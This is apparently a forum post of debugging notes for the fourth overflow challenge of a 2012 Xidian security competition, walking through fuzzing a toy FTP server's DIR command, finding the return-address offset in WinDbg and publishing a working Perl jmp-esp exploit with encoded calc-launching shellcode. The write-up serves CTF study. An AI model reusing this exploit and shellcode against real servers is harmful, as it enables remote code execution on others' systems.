|
|
|
2012西電網絡攻防大賽 溢出第四題 調試筆記
昨天搞定第三題,今天來搞第四題,分析很簡單,不過在shellcode這里卡了半天。來看第四題說明:
1、 FTPServer.exe程序是一個簡易的FTP服務器;
2、 FTPServer在處理FTP服務器命令時缺少正確的緩沖區邊界檢查,遠程攻擊者可以利用這個漏洞以FTP進程權限在系統上執行任意指令;
3、 請你找出bug,并嘗試exploit,以打開計算器程序為成功;
4、 需要簡要文字敘述;
5、 提交格式可參考第三題給出的附件。
這次是一個ftp服務器,并沒有給出具體的漏洞細節,需要自己來找bug.
先運行程序,設置一下帳號 user,ftp123 然后開啟服務。windbg附加上進程。
用msf生成一個超長字符串然后登錄ftp手工fuzz一下:
root@scan:~# /opt/metasploit/apps/pro/msf3/tools/pattern_create.rb 2000 > ~/Desktop/hi.txt
root@scan:~/Desktop# ftp 192.168.1.16
Connected to 192.168.1.16.
220 ��ӭ����FTP������!
Name (192.168.1.16:root): user
331 Password required for user
Password:
230 Logged on
Remote system type is UNIX.
ftp> ?
Commands may be abbreviated. Commands are:
! dir mdelete qc site
$ disconnect mdir sendport size
account exit mget put status
append form mkdir pwd struct
ascii get mls quit system
bell glob mode quote sunique
binary hash modtime recv tenex
bye help mput reget tick
case idle newer rstatus trace
cd image nmap rhelp type
cdup ipany nlist rename user
chmod ipv4 ntrans reset umask
close ipv6 open restart verbose
cr lcd prompt rmdir ?
delete ls passive runique
debug macdef proxy send
ftp> dir Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co
200 Port command successful
運氣太好了吧,第一個命令就有問題。服務端windbg捕獲到了異常,eip被改寫成了 41387141.
溢出后,esp指向的內容我們也可以控制。
0:000> g
ModLoad: 76300000 7631d000 C:\WINDOWS\system32\IMM32.DLL
ModLoad: 62c20000 62c29000 C:\WINDOWS\system32\LPK.DLL
ModLoad: 73fa0000 7400b000 C:\WINDOWS\system32\USP10.dll
ModLoad: 61be0000 61bed000 C:\WINDOWS\system32\MFC42LOC.DLL
ModLoad: 10000000 1009f000 C:\Documents and Settings\All Users\Application Data\Tencent\TSVulFw\TSVulFW.DAT
ModLoad: 76bc0000 76bcb000 C:\WINDOWS\system32\PSAPI.DLL
ModLoad: 770f0000 7717c000 C:\WINDOWS\system32\OLEAUT32.dll
ModLoad: 74680000 746cb000 C:\WINDOWS\system32\MSCTF.dll
ModLoad: 73640000 7366e000 C:\WINDOWS\system32\msctfime.ime
ModLoad: 5adc0000 5adf7000 C:\WINDOWS\system32\UxTheme.dll
ModLoad: 719c0000 719fe000 C:\WINDOWS\System32\mswsock.dll
ModLoad: 76ef0000 76f17000 C:\WINDOWS\system32\DNSAPI.dll
ModLoad: 76f80000 76f88000 C:\WINDOWS\System32\winrnr.dll
ModLoad: 76f30000 76f5c000 C:\WINDOWS\system32\WLDAP32.dll
ModLoad: 76f90000 76f96000 C:\WINDOWS\system32\rasadhlp.dll
ModLoad: 60fd0000 61025000 C:\WINDOWS\system32\hnetcfg.dll
ModLoad: 71a00000 71a08000 C:\WINDOWS\System32\wshtcpip.dll
(874.11e0): Access violation – code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00ffe214 ebx=00000000 ecx=0038d8f0 edx=ababab00 esi=00ffeaf4 edi=00ffea58
eip=41387141 esp=00ffe410 ebp=37714136 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
41387141 ?? ???
0:002> d esp
00ffe410 71 39 41 72 30 41 72 31-41 72 32 41 72 33 41 72 q9Ar0Ar1Ar2Ar3Ar
00ffe420 34 41 72 35 41 72 36 41-72 37 41 72 38 41 72 39 4Ar5Ar6Ar7Ar8Ar9
00ffe430 41 73 30 41 73 31 41 73-32 41 73 33 41 73 34 41 As0As1As2As3As4A
00ffe440 73 35 41 73 36 41 73 37-41 73 38 41 73 39 41 74 s5As6As7As8As9At
00ffe450 30 41 74 31 41 74 32 41-74 33 41 74 34 41 74 35 0At1At2At3At4At5
00ffe460 41 74 36 41 74 37 41 74-38 41 74 39 41 75 30 41 At6At7At8At9Au0A
00ffe470 75 31 41 75 32 41 75 33-41 75 34 41 75 35 41 75 u1Au2Au3Au4Au5Au
00ffe480 36 41 75 37 41 75 38 41-75 39 41 76 30 41 76 31 6Au7Au8Au9Av0Av1
定位一下溢出點:
root@scan:~/Desktop# /opt/metasploit/apps/pro/msf3/tools/pattern_offset.rb 41387141 Exact match at offset 504
root@scan:~/Desktop# /opt/metasploit/apps/pro/msf3/tools/pattern_offset.rb q9Ar Exact match at offset 508
發現第504字符后的 4字節覆蓋了返回地址,返回后面就是esp指向的內存。
這個題目似乎比第三題目還要簡單,esp所指的內存區域空間足以容納很大的shellcode.經典的jmp esp方式應該沒有問題。
504垃圾數據 4 字節返回地址 shellcode長度
[nops] [jmp esp ] [shellcode]
老規矩看看其他寄存器或者棧上的變量吧
0:002> r
eax=00ffe214 ebx=00000000 ecx=0038d8f0 edx=ababab00 esi=00ffeaf4 edi=00ffea58
eip=41387141 esp=00ffe410 ebp=37714136 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
41387141 ?? ???
0:002> d eax
00ffe214 41 61 30 41 61 31 41 61-32 41 61 33 41 61 34 41 Aa0Aa1Aa2Aa3Aa4A
00ffe224 61 35 41 61 36 41 61 37-41 61 38 41 61 39 41 62 a5Aa6Aa7Aa8Aa9Ab
00ffe234 30 41 62 31 41 62 32 41-62 33 41 62 34 41 62 35 0Ab1Ab2Ab3Ab4Ab5
00ffe244 41 62 36 41 62 37 41 62-38 41 62 39 41 63 30 41 Ab6Ab7Ab8Ab9Ac0A
00ffe254 63 31 41 63 32 41 63 33-41 63 34 41 63 35 41 63 c1Ac2Ac3Ac4Ac5Ac
00ffe264 36 41 63 37 41 63 38 41-63 39 41 64 30 41 64 31 6Ac7Ac8Ac9Ad0Ad1
00ffe274 41 64 32 41 64 33 41 64-34 41 64 35 41 64 36 41 Ad2Ad3Ad4Ad5Ad6A
00ffe284 64 37 41 64 38 41 64 39-41 65 30 41 65 31 41 65 d7Ad8Ad9Ae0Ae1Ae
0:002> d edx
ababab00 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
ababab10 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
ababab20 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
ababab30 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
ababab40 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
ababab50 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
ababab60 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
ababab70 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
0:002> d esi
00ffeaf4 00 00 00 00 68 b4 38 00-00 00 00 00 cc cc cc cc ….h.8………
00ffeb04 cc cc cc cc cc cc cc cc-cc cc cc cc cc cc cc cc …………….
00ffeb14 cc cc cc cc cc cc cc cc-cc cc cc cc cc cc cc cc …………….
00ffeb24 cc cc cc cc cc cc cc cc-cc cc cc cc cc cc cc cc …………….
00ffeb34 cc cc cc cc cc cc cc cc-cc cc cc cc 4c eb ff 00 …………L…
00ffeb44 4c eb ff 00 d7 07 00 00-1c b9 38 00 cc cc cc cc L………8…..
00ffeb54 cc cc cc cc cc cc cc cc-cc cc cc cc cc cc cc cc …………….
00ffeb64 cc cc cc cc cc cc cc cc-cc cc cc cc cc cc cc cc …………….
0:002> d edi
00ffea58 14 e4 ff 00 e0 ea ff 00-a8 dc 42 00 01 00 00 00 ……….B…..
00ffea68 ec ea ff 00 ca c9 40 00-58 fc ff 00 f4 ea ff 00 ……@.X…….
00ffea78 00 00 00 00 cc cc cc cc-cc cc cc cc cc cc cc cc …………….
00ffea88 cc cc cc cc cc cc cc cc-cc cc cc cc cc cc cc cc …………….
00ffea98 cc cc cc cc cc cc cc cc-cc cc cc cc cc cc cc cc …………….
00ffeaa8 cc cc cc cc cc cc cc cc-cc cc cc cc cc cc cc cc …………….
00ffeab8 cc cc cc cc cc ea ff 00-cc ea ff 00 d0 ea ff 00 …………….
00ffeac8 d0 ea ff 00 d4 86 e0 73-1c b9 38 00 d5 07 00 00 …….s..8…..
運氣還是非常好,eax寄存器還是指向我們字符串的開頭,棧中的函數參數也不用看了。可以直接利用第三題目的方法寫一個比較通用的exploit了。
我們的exploit字符串就這樣組織:
504 shellcode 4 字節返回地址
[nops + shellcode] [call eax ]
找一個好用的跳轉地址
root@scan:~/Desktop# /opt/metasploit/app/msfpescan -j eax FTPServer.exe
[FTPServer.exe]
0x0042bcdd push eax; ret
0x0044c9ae push eax; ret
0x004513fb jmp eax
0x0045151b jmp eax
0x004515b3 jmp eax
0×00451753 call eax
0×00451883 jmp eax
0x004519b3 call eax
0x00451a9b jmp eax
0x00451b8b jmp eax
0x0045207b call eax
0x004521db call eax
0x004523a3 jmp eax
0x004524bb call eax
……
但是實際測試的時候發現有點小問題,首先shellcode的編碼問題就是一個頭疼的問題,0x0a,0x0d,0×20,0×23這些都可能有特殊含義。開始的字符似乎不是ascii碼就不能發送過去,最后無奈的還是暫時放棄jmp eax的利用方式,還是采用了經典的 jmp esp方式利用成功的。
上Exp:
#!/usr/bin/perl
use Net::FTP;
print "2012西電網絡攻防大賽 溢出第四題 jmp esp exploit\n";
print "by c4rp3nt3r@0x50sec.org\n";
my $ip = '192.168.1.16';
$ftp = Net::FTP->new($ip, Debug => 0) or die "Cannot connect to $ip: $@";
$ftp->login("user",'ftp123') or die "Cannot login ", $ftp->message;
my $junk = "A" x 504;
my $eip = pack('V',0x7ffa4512); # jmp esp
#msf payload(exec) > generate -b '\x00\xff\x23\x20\x21\x0a\x0d' -t pl
# windows/exec - 223 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# VERBOSE=false, PrependMigrate=false, EXITFUNC=process,
# CMD=CALC
my $payload =
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xd9\xea\xd9\x74\x24\xf4\xbb\xc1\x1f\x70\x89\x5f\x33\xc9" .
"\xb1\x32\x83\xef\xfc\x31\x5f\x13\x03\x9e\x0c\x92\x7c\xdc" .
"\xdb\xdb\x7f\x1c\x1c\xbc\xf6\xf9\x2d\xee\x6d\x8a\x1c\x3e" .
"\xe5\xde\xac\xb5\xab\xca\x27\xbb\x63\xfd\x80\x76\x52\x30" .
"\x10\xb7\x5a\x9e\xd2\xd9\x26\xdc\x06\x3a\x16\x2f\x5b\x3b" .
"\x5f\x4d\x94\x69\x08\x1a\x07\x9e\x3d\x5e\x94\x9f\x91\xd5" .
"\xa4\xe7\x94\x29\x50\x52\x96\x79\xc9\xe9\xd0\x61\x61\xb5" .
"\xc0\x90\xa6\xa5\x3d\xdb\xc3\x1e\xb5\xda\x05\x6f\x36\xed" .
"\x69\x3c\x09\xc2\x67\x3c\x4d\xe4\x97\x4b\xa5\x17\x25\x4c" .
"\x7e\x6a\xf1\xd9\x63\xcc\x72\x79\x40\xed\x57\x1c\x03\xe1" .
"\x1c\x6a\x4b\xe5\xa3\xbf\xe7\x11\x2f\x3e\x28\x90\x6b\x65" .
"\xec\xf9\x28\x04\xb5\xa7\x9f\x39\xa5\x0f\x7f\x9c\xad\xbd" .
"\x94\xa6\xef\xab\x6b\x2a\x8a\x92\x6c\x34\x95\xb4\x04\x05" .
"\x1e\x5b\x52\x9a\xf5\x18\xac\xd0\x54\x08\x25\xbd\x0c\x09" .
"\x28\x3e\xfb\x4d\x55\xbd\x0e\x2d\xa2\xdd\x7a\x28\xee\x59" .
"\x96\x40\x7f\x0c\x98\xf7\x80\x05\xdb\xb6\x32\xe5\xdc";
$ftp->dir($junk.$eip.$payload) or die "Cannot list directory ", $ftp->message;
$ftp->quit; |
|
加載中...
發表于 2013-8-9 22:07:23
QQ好友和群
收藏
發表于 2013-11-14 10:17:13
